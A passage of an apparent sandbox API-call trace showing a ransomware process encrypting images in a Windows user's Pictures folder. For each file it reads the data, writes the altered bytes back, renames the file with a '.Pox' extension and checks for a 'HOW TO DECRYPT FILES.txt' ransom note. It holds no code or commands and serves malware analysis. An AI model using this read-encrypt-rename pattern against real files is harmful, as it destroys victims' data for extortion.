(dwNewMode=0x1, lpOldMode=0x3ae434) returned 1 [0040.452] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\AamMrzPmlGyXhuwAk.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\aammrzpmlgyxhuwak.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0040.453] GetFileType (hFile=0x26c) returned 0x1 [0040.453] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae430) returned 1 [0040.453] GetFileType (hFile=0x26c) returned 0x1 [0040.453] WriteFile (in: hFile=0x26c, lpBuffer=0x23da4ec*, nNumberOfBytesToWrite=0x2c80, lpNumberOfBytesWritten=0x3ae4f0, lpOverlapped=0x0 | out: lpBuffer=0x23da4ec*, lpNumberOfBytesWritten=0x3ae4f0*=0x2c80, lpOverlapped=0x0) returned 1 [0040.454] CloseHandle (hObject=0x26c) returned 1 [0040.455] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\AamMrzPmlGyXhuwAk.png", nBufferLength=0x105, lpBuffer=0x3ae074, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\AamMrzPmlGyXhuwAk.png", lpFilePart=0x0) returned 0x45 [0040.455] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\AamMrzPmlGyXhuwAk.png.Pox", nBufferLength=0x105, lpBuffer=0x3ae074, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\AamMrzPmlGyXhuwAk.png.Pox", lpFilePart=0x0) returned 0x49 [0040.455] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4d4) returned 1 [0040.455] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\AamMrzPmlGyXhuwAk.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\aammrzpmlgyxhuwak.png"), fInfoLevelId=0x0, lpFileInformation=0x3ae550 | out: lpFileInformation=0x3ae550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7b65d70, ftCreationTime.dwHighDateTime=0x1d4c947, ftLastAccessTime.dwLowDateTime=0x6e9b4df0, ftLastAccessTime.dwHighDateTime=0x1d4d0ca, ftLastWriteTime.dwLowDateTime=0x2a4cfea0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x2c80)) returned 1 [0040.455] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4d0) returned 1 [0040.455] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\AamMrzPmlGyXhuwAk.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\aammrzpmlgyxhuwak.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\AamMrzPmlGyXhuwAk.png.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\aammrzpmlgyxhuwak.png.pox")) returned 1 [0040.456] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\EOesE9egGtlf_.jpg", nBufferLength=0x105, lpBuffer=0x3adf54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\EOesE9egGtlf_.jpg", lpFilePart=0x0) returned 0x41 [0040.456] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae448) returned 1 [0040.456] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\EOesE9egGtlf_.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\eoese9eggtlf_.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0040.456] GetFileType (hFile=0x26c) returned 0x1 [0040.456] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae444) returned 1 [0040.456] GetFileType (hFile=0x26c) returned 0x1 [0040.456] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae550 | out: lpFileSizeHigh=0x3ae550*=0x0) returned 0xccd2 [0040.456] ReadFile (in: hFile=0x26c, lpBuffer=0x23dd74c, nNumberOfBytesToRead=0xccd2, lpNumberOfBytesRead=0x3ae4fc, lpOverlapped=0x0 | out: lpBuffer=0x23dd74c*, lpNumberOfBytesRead=0x3ae4fc*=0xccd2, lpOverlapped=0x0) returned 1 [0040.458] CloseHandle (hObject=0x26c) returned 1 [0040.474] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae068, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0040.474] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4c8) returned 1 [0040.474] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae544 | out: lpFileInformation=0x3ae544*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.474] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4c4) returned 1 [0040.474] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\EOesE9egGtlf_.jpg", nBufferLength=0x105, lpBuffer=0x3adf40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\EOesE9egGtlf_.jpg", lpFilePart=0x0) returned 0x41 [0040.474] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae434) returned 1 [0040.474] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\EOesE9egGtlf_.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\eoese9eggtlf_.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0040.475] GetFileType (hFile=0x26c) returned 0x1 [0040.476] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae430) returned 1 [0040.476] GetFileType (hFile=0x26c) returned 0x1 [0040.476] WriteFile (in: hFile=0x26c, lpBuffer=0x2450d48*, nNumberOfBytesToWrite=0xcce0, lpNumberOfBytesWritten=0x3ae4f0, lpOverlapped=0x0 | out: lpBuffer=0x2450d48*, lpNumberOfBytesWritten=0x3ae4f0*=0xcce0, lpOverlapped=0x0) returned 1 [0040.477] CloseHandle (hObject=0x26c) returned 1 [0040.478] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\EOesE9egGtlf_.jpg", nBufferLength=0x105, lpBuffer=0x3ae074, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\EOesE9egGtlf_.jpg", lpFilePart=0x0) returned 0x41 [0040.478] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\EOesE9egGtlf_.jpg.Pox", nBufferLength=0x105, lpBuffer=0x3ae074, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\EOesE9egGtlf_.jpg.Pox", lpFilePart=0x0) returned 0x45 [0040.478] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4d4) returned 1 [0040.478] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\EOesE9egGtlf_.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\eoese9eggtlf_.jpg"), fInfoLevelId=0x0, lpFileInformation=0x3ae550 | out: lpFileInformation=0x3ae550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77c9b310, ftCreationTime.dwHighDateTime=0x1d4d44b, ftLastAccessTime.dwLowDateTime=0x2eef17a0, ftLastAccessTime.dwHighDateTime=0x1d4c8f9, ftLastWriteTime.dwLowDateTime=0x2a4f6000, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0xcce0)) returned 1 [0040.478] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4d0) returned 1 [0040.478] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\EOesE9egGtlf_.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\eoese9eggtlf_.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\EOesE9egGtlf_.jpg.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\eoese9eggtlf_.jpg.pox")) returned 1 [0040.479] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\LNbCQirEd1.bmp", nBufferLength=0x105, lpBuffer=0x3adf54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\LNbCQirEd1.bmp", lpFilePart=0x0) returned 0x3e [0040.479] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae448) returned 1 [0040.479] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\LNbCQirEd1.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\lnbcqired1.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0040.479] GetFileType (hFile=0x26c) returned 0x1 [0040.479] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae444) returned 1 [0040.479] GetFileType (hFile=0x26c) returned 0x1 [0040.479] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae550 | out: lpFileSizeHigh=0x3ae550*=0x0) returned 0x14f0b [0040.479] ReadFile (in: hFile=0x26c, lpBuffer=0x365f798, nNumberOfBytesToRead=0x14f0b, lpNumberOfBytesRead=0x3ae4fc, lpOverlapped=0x0 | out: lpBuffer=0x365f798*, lpNumberOfBytesRead=0x3ae4fc*=0x14f0b, lpOverlapped=0x0) returned 1 [0040.480] CloseHandle (hObject=0x26c) returned 1 [0040.496] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae068, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0040.496] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4c8) returned 1 [0040.496] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae544 | out: lpFileInformation=0x3ae544*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.497] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4c4) returned 1 [0040.497] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\LNbCQirEd1.bmp", nBufferLength=0x105, lpBuffer=0x3adf40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\LNbCQirEd1.bmp", lpFilePart=0x0) returned 0x3e [0040.497] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae434) returned 1 [0040.497] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\LNbCQirEd1.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\lnbcqired1.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0040.498] GetFileType (hFile=0x26c) returned 0x1 [0040.498] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae430) returned 1 [0040.498] GetFileType (hFile=0x26c) returned 0x1 [0040.498] WriteFile (in: hFile=0x26c, lpBuffer=0x36c8320*, nNumberOfBytesToWrite=0x14f10, lpNumberOfBytesWritten=0x3ae4f0, lpOverlapped=0x0 | out: lpBuffer=0x36c8320*, lpNumberOfBytesWritten=0x3ae4f0*=0x14f10, lpOverlapped=0x0) returned 1 [0040.503] CloseHandle (hObject=0x26c) returned 1 [0040.504] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\LNbCQirEd1.bmp", nBufferLength=0x105, lpBuffer=0x3ae074, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\LNbCQirEd1.bmp", lpFilePart=0x0) returned 0x3e [0040.504] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\LNbCQirEd1.bmp.Pox", nBufferLength=0x105, lpBuffer=0x3ae074, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\LNbCQirEd1.bmp.Pox", lpFilePart=0x0) returned 0x42 [0040.504] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4d4) returned 1 [0040.504] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\LNbCQirEd1.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\lnbcqired1.bmp"), fInfoLevelId=0x0, lpFileInformation=0x3ae550 | out: lpFileInformation=0x3ae550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1f91080, ftCreationTime.dwHighDateTime=0x1d4cd98, ftLastAccessTime.dwLowDateTime=0xe6dd7280, ftLastAccessTime.dwHighDateTime=0x1d4d394, ftLastWriteTime.dwLowDateTime=0x2a5422c0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x14f10)) returned 1 [0040.504] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4d0) returned 1 [0040.505] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\LNbCQirEd1.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\lnbcqired1.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\LNbCQirEd1.bmp.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\lnbcqired1.bmp.pox")) returned 1 [0040.505] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\UFVPng9rMg2O.bmp", nBufferLength=0x105, lpBuffer=0x3adf54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\UFVPng9rMg2O.bmp", lpFilePart=0x0) returned 0x40 [0040.505] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae448) returned 1 [0040.505] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\UFVPng9rMg2O.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\ufvpng9rmg2o.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0040.505] GetFileType (hFile=0x26c) returned 0x1 [0040.505] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae444) returned 1 [0040.505] GetFileType (hFile=0x26c) returned 0x1 [0040.505] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae550 | out: lpFileSizeHigh=0x3ae550*=0x0) returned 0x49c4 [0040.505] ReadFile (in: hFile=0x26c, lpBuffer=0x24ab370, nNumberOfBytesToRead=0x49c4, lpNumberOfBytesRead=0x3ae4fc, lpOverlapped=0x0 | out: lpBuffer=0x24ab370*, lpNumberOfBytesRead=0x3ae4fc*=0x49c4, lpOverlapped=0x0) returned 1 [0040.506] CloseHandle (hObject=0x26c) returned 1 [0040.521] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae068, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0040.521] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4c8) returned 1 [0040.521] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae544 | out: lpFileInformation=0x3ae544*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.521] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4c4) returned 1 [0040.521] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\UFVPng9rMg2O.bmp", nBufferLength=0x105, lpBuffer=0x3adf40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\UFVPng9rMg2O.bmp", lpFilePart=0x0) returned 0x40 [0040.521] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae434) returned 1 [0040.521] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\UFVPng9rMg2O.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\ufvpng9rmg2o.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0040.522] GetFileType (hFile=0x26c) returned 0x1 [0040.522] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae430) returned 1 [0040.522] GetFileType (hFile=0x26c) returned 0x1 [0040.522] WriteFile (in: hFile=0x26c, lpBuffer=0x250f268*, nNumberOfBytesToWrite=0x49d0, lpNumberOfBytesWritten=0x3ae4f0, lpOverlapped=0x0 | out: lpBuffer=0x250f268*, lpNumberOfBytesWritten=0x3ae4f0*=0x49d0, lpOverlapped=0x0) returned 1 [0040.524] CloseHandle (hObject=0x26c) returned 1 [0040.525] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\UFVPng9rMg2O.bmp", nBufferLength=0x105, lpBuffer=0x3ae074, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\UFVPng9rMg2O.bmp", lpFilePart=0x0) returned 0x40 [0040.525] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\UFVPng9rMg2O.bmp.Pox", nBufferLength=0x105, lpBuffer=0x3ae074, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\UFVPng9rMg2O.bmp.Pox", lpFilePart=0x0) returned 0x44 [0040.525] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4d4) returned 1 [0040.525] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\UFVPng9rMg2O.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\ufvpng9rmg2o.bmp"), fInfoLevelId=0x0, lpFileInformation=0x3ae550 | out: lpFileInformation=0x3ae550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x317070f0, ftCreationTime.dwHighDateTime=0x1d4cd4f, ftLastAccessTime.dwLowDateTime=0xb764e240, ftLastAccessTime.dwHighDateTime=0x1d4d330, ftLastWriteTime.dwLowDateTime=0x2a568420, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x49d0)) returned 1 [0040.525] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4d0) returned 1 [0040.525] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\UFVPng9rMg2O.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\ufvpng9rmg2o.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\UFVPng9rMg2O.bmp.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\ufvpng9rmg2o.bmp.pox")) returned 1 [0040.525] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae530) returned 1 [0040.525] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3", nBufferLength=0x105, lpBuffer=0x3ae038, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3", lpFilePart=0x0) returned 0x43 [0040.525] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\", nBufferLength=0x105, lpBuffer=0x3ae00c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\", lpFilePart=0x0) returned 0x44 [0040.526] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\*", lpFindFileData=0x3ae258 | out: lpFindFileData=0x3ae258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9ba3ff0, ftCreationTime.dwHighDateTime=0x1d4d3aa, ftLastAccessTime.dwLowDateTime=0x4b5ad090, ftLastAccessTime.dwHighDateTime=0x1d4cfda, ftLastWriteTime.dwLowDateTime=0x4b5ad090, ftLastWriteTime.dwHighDateTime=0x1d4cfda, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x405d88 [0040.526] FindNextFileW (in: hFindFile=0x405d88, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9ba3ff0, ftCreationTime.dwHighDateTime=0x1d4d3aa, ftLastAccessTime.dwLowDateTime=0x4b5ad090, ftLastAccessTime.dwHighDateTime=0x1d4cfda, ftLastWriteTime.dwLowDateTime=0x4b5ad090, ftLastWriteTime.dwHighDateTime=0x1d4cfda, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.526] FindNextFileW (in: hFindFile=0x405d88, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc89686b0, ftCreationTime.dwHighDateTime=0x1d4d031, ftLastAccessTime.dwLowDateTime=0xfb1c9730, ftLastAccessTime.dwHighDateTime=0x1d4d489, ftLastWriteTime.dwLowDateTime=0xfb1c9730, ftLastWriteTime.dwHighDateTime=0x1d4d489, nFileSizeHigh=0x0, nFileSizeLow=0xfe99, dwReserved0=0x0, dwReserved1=0x0, cFileName="jjlE9sKEgSgYfe.gif", cAlternateFileName="JJLE9S~1.GIF")) returned 1 [0040.526] FindNextFileW (in: hFindFile=0x405d88, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2cad5860, ftCreationTime.dwHighDateTime=0x1d4c761, ftLastAccessTime.dwLowDateTime=0xe35f2d60, ftLastAccessTime.dwHighDateTime=0x1d4cbe2, ftLastWriteTime.dwLowDateTime=0xe35f2d60, ftLastWriteTime.dwHighDateTime=0x1d4cbe2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LXgD hT", cAlternateFileName="LXGDHT~1")) returned 1 [0040.526] FindNextFileW (in: hFindFile=0x405d88, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe1a7ad0, ftCreationTime.dwHighDateTime=0x1d4d4be, ftLastAccessTime.dwLowDateTime=0xa4bcaa00, ftLastAccessTime.dwHighDateTime=0x1d4d598, ftLastWriteTime.dwLowDateTime=0xa4bcaa00, ftLastWriteTime.dwHighDateTime=0x1d4d598, nFileSizeHigh=0x0, nFileSizeLow=0xa5a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PkHSV- FwSU8Ry.png", cAlternateFileName="PKHSV-~1.PNG")) returned 1 [0040.527] FindNextFileW (in: hFindFile=0x405d88, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe883b240, ftCreationTime.dwHighDateTime=0x1d4cbae, ftLastAccessTime.dwLowDateTime=0x2dabd370, ftLastAccessTime.dwHighDateTime=0x1d4d3d4, ftLastWriteTime.dwLowDateTime=0x2dabd370, ftLastWriteTime.dwHighDateTime=0x1d4d3d4, nFileSizeHigh=0x0, nFileSizeLow=0x14ea3, dwReserved0=0x0, dwReserved1=0x0, cFileName="qy8DQkizNwG4c.jpg", cAlternateFileName="QY8DQK~1.JPG")) returned 1 [0040.527] FindNextFileW (in: hFindFile=0x405d88, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf76092b0, ftCreationTime.dwHighDateTime=0x1d4c5b9, ftLastAccessTime.dwLowDateTime=0x9de4df60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0x9de4df60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="s95FnDm 7mO2PYSi2", cAlternateFileName="S95FND~1")) returned 1 [0040.527] FindNextFileW (in: hFindFile=0x405d88, lpFindFileData=0x3ae268 | 